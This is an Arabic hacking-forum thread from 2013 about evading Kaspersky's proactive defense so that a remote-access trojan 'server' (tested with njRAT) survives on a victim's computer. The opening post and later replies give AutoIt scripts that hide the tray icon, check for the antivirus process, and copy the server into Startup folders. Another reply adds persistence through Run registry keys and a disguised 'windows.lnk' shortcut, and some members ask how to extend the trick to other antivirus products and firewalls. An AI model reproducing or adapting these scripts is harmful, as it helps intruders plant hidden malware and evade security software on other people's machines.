تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

الباتش النّائم · منذ /02-22-2013, 01:29 PM

"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي

تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم

جمعة مباركة نتمنّاها للجميع

الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها

راجعت بعض الأسطوانات عندي للغة AutoiT فوجدتــ أحدها يتكلّم عن العبارة الشّرطيّة if

قلت لما لا أطبّقها و أرى النّتيجة يعني " إن .....فـ"

مبدأ الفكرة:

هو أن جميع برامج البدأ تشتغل قبل الكاسبر ، يعني قبل هو ما يتحرّك يكون السّيرفر قد

ثبّت و لا مجال لمراقبته

سلبيّاتها:

لازم الشّخص المستهدف يعمل روستارت للجهاز ( يعني راح يعمل روستارت يعمل)

المتطلّبات:

*1 سيرفر كلين من الكاسبر لأيّ برنامج إختراقـ

*2 إعداداتك كاملة ( تثبيت في الرّيجيستري، مع التّشغيل و و و ....)

*3 برنامج الـ AutoiT (موجود في الموقع الرّسمي )

و لنبدأ على بركة الله بشرح الـ script المراد كتابته :

*1 نضع الشّرط : إن كان الكاسبر شغّالـ

*2 جواب الشّرط: السّيرفر لا يشتغل بل ينسخ نفسه في StartUp

يعني بمجرّد ما يشتغل الكمبيوتر يستغل السّيرفر

*3 إن كان العكس يشتغل السّيرفر مباشرة ( إضافةفقط)

الكود جاهز و قابل للإضافات

كود:

#NoTrayIcon
Opt("TrayIconHide", 1)
if ProcessExists("avp.exe") Then
FileCopy("server.exe",@startupDir)
Else
Run("server.exe")
EndIf

للعلم فقد تمّ تجربته قبل وضع هنا على Njrat و السّلام عليكم

المصدر: development-point - للمزيد تابع : قسم إختراق الأجـهـزه والأيـمـيـلات

jo'~d hg]~thu hgYsjfhrd gg;hsfv "H]ogJ ggj~',dv"

EDZw4sS!m · منذ /02-22-2013, 02:58 PM

مشكور يعطيك العافية
جاري الجربة

MR:HACK · منذ /02-22-2013, 04:25 PM

مــشـــــكور اخي

بارك الله فيك

لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ

منتظرك

ThE CrEzY · منذ /02-22-2013, 05:54 PM


	المشاركة الأصلية كتبت بواسطة mr:hack


	مــشـــــكور اخي بارك الله فيك لكن استفسار بعد اذنك ممكن ان اضع اكثر من بروسيس حماية في السكريبت يعني اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ منتظرك

نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق

MR:HACK · منذ /02-22-2013, 06:07 PM


	المشاركة الأصلية كتبت بواسطة the crezy


	نعم فالامر سهل كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة بالتوفيق

طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )

منتظرك

ThE CrEzY · منذ /02-22-2013, 06:18 PM


	المشاركة الأصلية كتبت بواسطة MR:HACK


	طيب , ممكن اسماء البروسيس لجميع انواع الحمايات ( التي لها دفاعات استباقية ) منتظرك

لا اعرفها اخي للاسف ( يمكنك البحث في قوقل )

الباتش النّائم · منذ /02-23-2013, 02:09 PM

MR:HACK
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ

كود:

If ProcessExists("avp.exe")

إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ

كود:

FileCopy("server.exe",@StartupCommonDir)

*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:

FileCopy("server.exe",@StartupCommonDir,1)

و الكود ككلّ يصبح

كود:

#NoTrayIcon
Opt("TrayIconHide", 1)
If ProcessExists("avp.exe") Then
	FileCopy("server.exe",@StartupCommonDir)
Else
	FileCopy("server.exe",@StartupCommonDir,1)
EndIf

الباتش النّائم · منذ /02-23-2013, 02:15 PM

هذا كود إضافي من أحد الأصدقاء تستطيع به تشغيلـ سيرفر الـCyber و الـ Xtrem

تقولي لماذا هما فقط أقلّك شرطه:

* لا تفعّل خاصيّة البدأ مع الويندوز Run على البرنامج

* لا تفعّل خاصيّة الحقن

* لا تفعّل خاصيّة التّبيت بالروجيستري

السّكريبت يقوم بذلك المهم السّيرفر يكون كلين

كود:

if Not FileExists(@AppDataDir&"\Microsoft\update.exe") Then
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        FileCreateShortcut("%APPDATA%\Microsoft\update.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "windows", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)
        FileInstall("update.exe",@AppDataDir&"\Microsoft\update.exe",1)
EndIf

update.exe هو إسم سيرفرك و إختراقات موفّقة

Dr..ViRuS · منذ /02-23-2013, 02:24 PM

يعطيكـ العافيه ياغالي يستفيدو منو الشباب وفي كمان شفت شرح

تخطي الدفاع الاستباقي افيرا

موفق يابعدي

MR:HACK · منذ /02-24-2013, 02:56 AM


	المشاركة الأصلية كتبت بواسطة الباتش النّائم


	mr:hack --------- أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe سنعيد كتابة السّكريب بتغيير بسيط 1 إذا كان الكاسبر شغّالــ كود: if processexists("avp.exe") إذا then قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ كود: filecopy("server.exe",@startupcommondir) 2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا كود: filecopy("server.exe",@startupcommondir,1) و الكود ككلّ يصبح كود: #notrayicon opt("trayiconhide", 1) if processexists("avp.exe") then filecopy("server.exe",@startupcommondir) else filecopy("server.exe",@startupcommondir,1) endif

اخي الكريم

هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟

و

هل يتخطى الفيروال ؟!؟

منتظرك

المواضيع المتشابهه للموضوع: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
[ مشكله ] الدّفاع الإستباقي	الباتش النّائم	مشاكل وحلول إختراق الأجهزة	7	02-20-2013 12:12 AM

الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)

تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم جمعة مباركة نتمنّاها للجميع الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها راجعت بعض الأسطوانات عندي للغة